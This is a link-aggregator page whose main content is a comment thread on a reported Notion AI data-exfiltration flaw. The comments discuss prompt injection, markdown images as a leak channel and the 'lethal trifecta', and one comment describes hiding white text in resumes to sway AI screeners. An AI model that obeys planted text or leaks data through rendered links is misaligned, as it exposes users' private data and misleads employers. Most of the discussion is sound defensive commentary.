frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Ask HN: How to Reduce Time Spent Crimping?

1•pinkmuffinere•1m ago•0 comments

KV Cache Transform Coding for Compact Storage in LLM Inference

https://arxiv.org/abs/2511.01815
1•walterbell•5m ago•0 comments

A quantitative, multimodal wearable bioelectronic device for stress assessment

https://www.nature.com/articles/s41467-025-67747-9
1•PaulHoule•7m ago•0 comments

Why Big Tech Is Throwing Cash into India in Quest for AI Supremacy

https://www.wsj.com/world/india/why-big-tech-is-throwing-cash-into-india-in-quest-for-ai-supremac...
1•saikatsg•7m ago•0 comments

How to shoot yourself in the foot – 2026 edition

https://github.com/aweussom/HowToShootYourselfInTheFoot
1•aweussom•8m ago•0 comments

Eight More Months of Agents

https://crawshaw.io/blog/eight-more-months-of-agents
3•archb•10m ago•0 comments

From Human Thought to Machine Coordination

https://www.psychologytoday.com/us/blog/the-digital-self/202602/from-human-thought-to-machine-coo...
1•walterbell•10m ago•0 comments

The new X API pricing must be a joke

https://developer.x.com/
1•danver0•11m ago•0 comments

Show HN: RMA Dashboard fast SAST results for monorepos (SARIF and triage)

https://rma-dashboard.bukhari-kibuka7.workers.dev/
1•bumahkib7•11m ago•0 comments

Show HN: Source code graphRAG for Java/Kotlin development based on jQAssistant

https://github.com/2015xli/jqassistant-graph-rag
1•artigent•16m ago•0 comments

Python Only Has One Real Competitor

https://mccue.dev/pages/2-6-26-python-competitor
3•dragandj•18m ago•0 comments

Tmux to Zellij (and Back)

https://www.mauriciopoppe.com/notes/tmux-to-zellij/
1•maurizzzio•19m ago•1 comments

Ask HN: How are you using specialized agents to accelerate your work?

1•otterley•20m ago•0 comments

Passing user_id through 6 services? OTel Baggage fixes this

https://signoz.io/blog/otel-baggage/
1•pranay01•21m ago•0 comments

DavMail Pop/IMAP/SMTP/Caldav/Carddav/LDAP Exchange Gateway

https://davmail.sourceforge.net/
1•todsacerdoti•21m ago•0 comments

Visual data modelling in the browser (open source)

https://github.com/sqlmodel/sqlmodel
1•Sean766•23m ago•0 comments

Show HN: Tharos – CLI to find and autofix security bugs using local LLMs

https://github.com/chinonsochikelue/tharos
1•fluantix•24m ago•0 comments

Oddly Simple GUI Programs

https://simonsafar.com/2024/win32_lights/
1•MaximilianEmel•24m ago•0 comments

The New Playbook for Leaders [pdf]

https://www.ibli.com/IBLI%20OnePagers%20The%20Plays%20Summarized.pdf
1•mooreds•25m ago•1 comments

Interactive Unboxing of J Dilla's Donuts

https://donuts20.vercel.app
1•sngahane•26m ago•0 comments

OneCourt helps blind and low-vision fans to track Super Bowl live

https://www.dezeen.com/2026/02/06/onecourt-tactile-device-super-bowl-blind-low-vision-fans/
1•gaws•28m ago•0 comments

Rudolf Vrba

https://en.wikipedia.org/wiki/Rudolf_Vrba
1•mooreds•28m ago•0 comments

Autism Incidence in Girls and Boys May Be Nearly Equal, Study Suggests

https://www.medpagetoday.com/neurology/autism/119747
1•paulpauper•29m ago•0 comments

Wellness Hotels Discovery Application

https://aurio.place/
1•cherrylinedev•30m ago•1 comments

NASA delays moon rocket launch by a month after fuel leaks during test

https://www.theguardian.com/science/2026/feb/03/nasa-delays-moon-rocket-launch-month-fuel-leaks-a...
1•mooreds•31m ago•0 comments

Sebastian Galiani on the Marginal Revolution

https://marginalrevolution.com/marginalrevolution/2026/02/sebastian-galiani-on-the-marginal-revol...
2•paulpauper•34m ago•0 comments

Ask HN: Are we at the point where software can improve itself?

1•ManuelKiessling•34m ago•2 comments

Binance Gives Trump Family's Crypto Firm a Leg Up

https://www.nytimes.com/2026/02/07/business/binance-trump-crypto.html
1•paulpauper•34m ago•1 comments

Reverse engineering Chinese 'shit-program' for absolute glory: R/ClaudeCode

https://old.reddit.com/r/ClaudeCode/comments/1qy5l0n/reverse_engineering_chinese_shitprogram_for/
1•edward•34m ago•0 comments

Indian Culture

https://indianculture.gov.in/
1•saikatsg•37m ago•0 comments
Open in hackernews

Notion AI: Unpatched data exfiltration

https://www.promptarmor.com/resources/notion-ai-unpatched-data-exfiltration
206•takira•1mo ago

Comments

jerryShaker•1mo ago
Unfortunate that Notion does not seem to be taking AI security more seriously, even after they got flak for other data exfil vulns in the 3.0 agents release in September
airstrike•1mo ago
IMHO the problem really comes from the browser accessing the URL without explicit user permission.

Bring back desktop software.

embedding-shape•1mo ago
Meh, bring back thinking of security regardless of the platform instead. The web is gonna stay, might as well wish for people to treat the security on the platform better.
rdli•1mo ago
Securing LLMs is just structurally different. The attack space is "the entirety of the human written language" which is effectively infinite. Wrapping your head around this is something we're only now starting to appreciate.

In general, treating LLM outputs (no matter where) as untrusted, and ensuring classic cybersecurity guardrails (sandboxing, data permissioning, logging) is the current SOTA on mitigation. It'll be interesting to see how approaches evolve as we figure out more.

vmg12•1mo ago
It's pretty simple, don't give llms access to anything that you can't afford to expose. You treat the llm as if it was the user.
rdli•1mo ago
I get that but just not entirely obvious how you do that for the Notion AI.
embedding-shape•1mo ago
Don't use AI/LLMs that have unfettered access to everything?

Feels like the question is "How do I prevent unauthenticated and anonymous users to use my endpoint that doesn't have any authentication and is on the public internet?", which is the wrong question.

whateveracct•1mo ago
exactly?
solid_fuel•4w ago
> You treat the llm as if it was the user.

That's not sufficient. If a user copies customer data into a public google sheet, I can reprimand and otherwise restrict the user. An LLM cannot be held accountable, and cannot learn from mistakes.

kahnclusions•1mo ago
I’m not convinced LLMs can ever be secured, prompt injection isn’t going away since it’s a fundamental part of how an LLM works. Tokens in, tokens out.
Barrin92•1mo ago
Dijkstra, On the Foolishness of "natural language programming":

[...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]

If only we had a way to tell a computer precisely what we want it to do...

https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...

jcims•1mo ago
As multi-step reasoning and tool use expand, they effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by the context (the anthropic paper on subliminal learning [1] was a bit eye opening in this regard) and subsequently have no deterministic way to protect it.

1 - https://alignment.anthropic.com/2025/subliminal-learning/

zbentley•4w ago
I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.

We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.

Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.

solid_fuel•4w ago
It's structurally impossible. LLMs, at their core, take trusted system input (the prompt) and multiply it against untrusted input from the users and the internet at large. There is no separation between the two, and there cannot be with the way LLMs work. They will always be vulnerable to prompt injection and manipulation.

The _only_ way to create a reasonably secure system that incorporates an LLM is to treat the LLM output as completely untrustworthy in all situations. All interactions must be validated against a security layer and any calls out of the system must be seen as potential data leaks - including web searches, GET requests, emails, anything.

You can still do useful things under that restriction but a lot of LLM tooling doesn't seem to grasp the fundamental security issues at play.

falloutx•1mo ago
People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you, There are also resume collecting services which let you buy a set of resumes belonging to your general competition era and you can compare your ai results with them. Its an arms race to get called up for a job interview at the moment.
Terr_•1mo ago
I wouldn't be surprised if people tried to document what LLMs different companies/vendors are using, in order to take advantage of model-biases.

https://nyudatascience.medium.com/language-models-often-favo...

AdieuToLogic•1mo ago
> People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you ...

I would caution against using "white hidden text" within PDF resumes as all an ATS[0] need use in order to make hidden text the same as any other text is preprocess with the poppler[1] project's `pdftotext`. Sophisticated ATS[0] offerings could also use `pdftotext` in a fraud detection role with other document formats as well.

0 - https://en.wikipedia.org/wiki/Applicant_tracking_system

1 - https://poppler.freedesktop.org/

jonplackett•1mo ago
Sloppy coding to know a link could be a problem and render it anyway. But even worse to ignore the person who tells you you did that.
mirekrusin•1mo ago
Public disclosure date is Jan 2025, but should be Jan 2026.
dcreater•1mo ago
One more reason not to use Notion.

I wonder when there will be awakening to not use SaaS for everything you do. And the sad thing is that this is the behavior of supposedly tech-savvy people in places like the bay area.

I think the next wave is going to be native apps, with a single purchase model - the way things used to be. AI is going to enable devs, even indie devs, to make such products.

bossyTeacher•1mo ago
> I think the next wave is going to be native apps

elaborate please?

dcreater•4w ago
The reason web apps and electron based apps became the de facto standard was that it removed the pain of building separately for each platform. A cost that understandably devs and companies want to avoid. Many years of this phenomenon also meant that TS/JS skills are widely available in the market but C/Swift etc. are relatively rare. LLMs completely upend this status quo as they can write in whatever language you want them to and perhaps more powerfully, can rewrite any app into whatever target language you want at effectively 0 cost/time. So a dev can decide to write in Swift for mac and ask LLMs to make a Windows version and so forth.
jrm4•1mo ago
This, of course, more yelling into the void from decades ago, but companies who promise or imply "safety around your data" and fail should be proportionally punished, and we as a society have not yet effectively figured out how to do that yet. Not sure what it will take.
pluralmonad•1mo ago
Its perfectly figured out, people just refuse to implement the solution. Stop giving your resources to the bad actors. The horrible behavior so many enable in order to not be inconvenienced is immense.
jrm4•1mo ago
Perfectly? No. No. A million times no.

You're getting downvoted because "stop giving your resources to the bad actors" is not even remotely close to a viable solution. There is no opting out in a meaningful way.

NOW, that being said. People like you and me should absolutely opt out to the extent that we can, but with the understanding that this is "for show," in a good way.

someguyiguess•1mo ago
Wow what a coincidence. I just migrated from notion to obsidian today. Looks like I timed it perfectly (or maybe slightly too late?)
dtkav•1mo ago
How was the migration process?

I work on a plugin that makes Obsidian real-time collaborative (relay.md), so if the migration is smooth I wonder how close we are to Obsidian being a suitable Notion replacement for small teams.

crashabr•1mo ago
I've been waiting for Logseq DB to come out to replace Google docs for my team. So your offering is interesting, but

1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

2) Don't you expect to be sherlocked by the obsidian team?

embedding-shape•1mo ago
> 1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

More or less yes, embeddable templates basically gives you that out of the box, Obsidian "Bases" let you query them.

> 2) Don't you expect to be sherlocked by the obsidian team?

I seem to remember that someone from the team once said they have no interest in building "real-time" collaboration features, but I might misremember and I cannot find it now.

And after all, Obsidian is a for-profit company who can change their mind, so as long as you don't try to build your own for-profit business on top of a use case that could be sherlocked, I think they're fine.

dtkav•1mo ago
From their roadmap page:

> Multiplayer > > Share notes and edit them collaboratively

https://obsidian.md/roadmap

embedding-shape•1mo ago
Doesn't say real-time there though? But yeah, must be what they mean, because you can in theory already collaborate on notes, via their "Sync", although it sucks for real-time collaboration.
dtkav•1mo ago
In Obsidian you can have transclusions which is basically an embed of a section of another note. It isn't perfect, but worth looking into.

Regarding getting sherlocked; Obsidian does have realtime collaboration on their roadmap. There are likely to be important differences in approach, though.

Our offering is available now and we're learning a ton about what customers want.

If anything, I'd actually love to work more closely with them. They are a huge inspiration in how to build a business and are around the state of the art of a philosophy of software.

I'm interested in combining the unix philosophy with native collaboration (with both LLMs and other people).

That vision is inherently collaborative, anti lock-in, and also bigger than Obsidian. The important lasting part is the graph-of-local-files, not the editor (though Obsidian is fantastic).

someguyiguess•3w ago
Sorry for the late reply. The migration was really easy actually. I used the official migration plugin. There were a few things it couldn’t transfer over though (voice transcription notes)
dtkav•3w ago
Very helpful, thank you.
brimtown•1mo ago
This is @simonw’s Lethal Trifecta [1] again - access to private data and untrusted input are arguably the purpose of enterprise agents, so any external communication is unsafe. Markdown images are just the ones people usually forget about

[1] https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/

Miyamura80•1mo ago
Good point around the markdown image as an untrusted vector. Lethal trifecta is determnistically preventable, it really should be addressed wider in the indutry
noleary•1mo ago
> We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.
hxugufjfjf•1mo ago
As much as I love using Notion, they have a terrible track record when it comes to dealing with and responding to security issues.
digiown•1mo ago
Any data that leaves the machines you control, especially to a service like Notion, is already "exfiltrated" anyway. Never trust any consumer grade service without an explicit contract for any important data you don't want exfiltrated. They will play fast and loose with your data, since there is so little downside.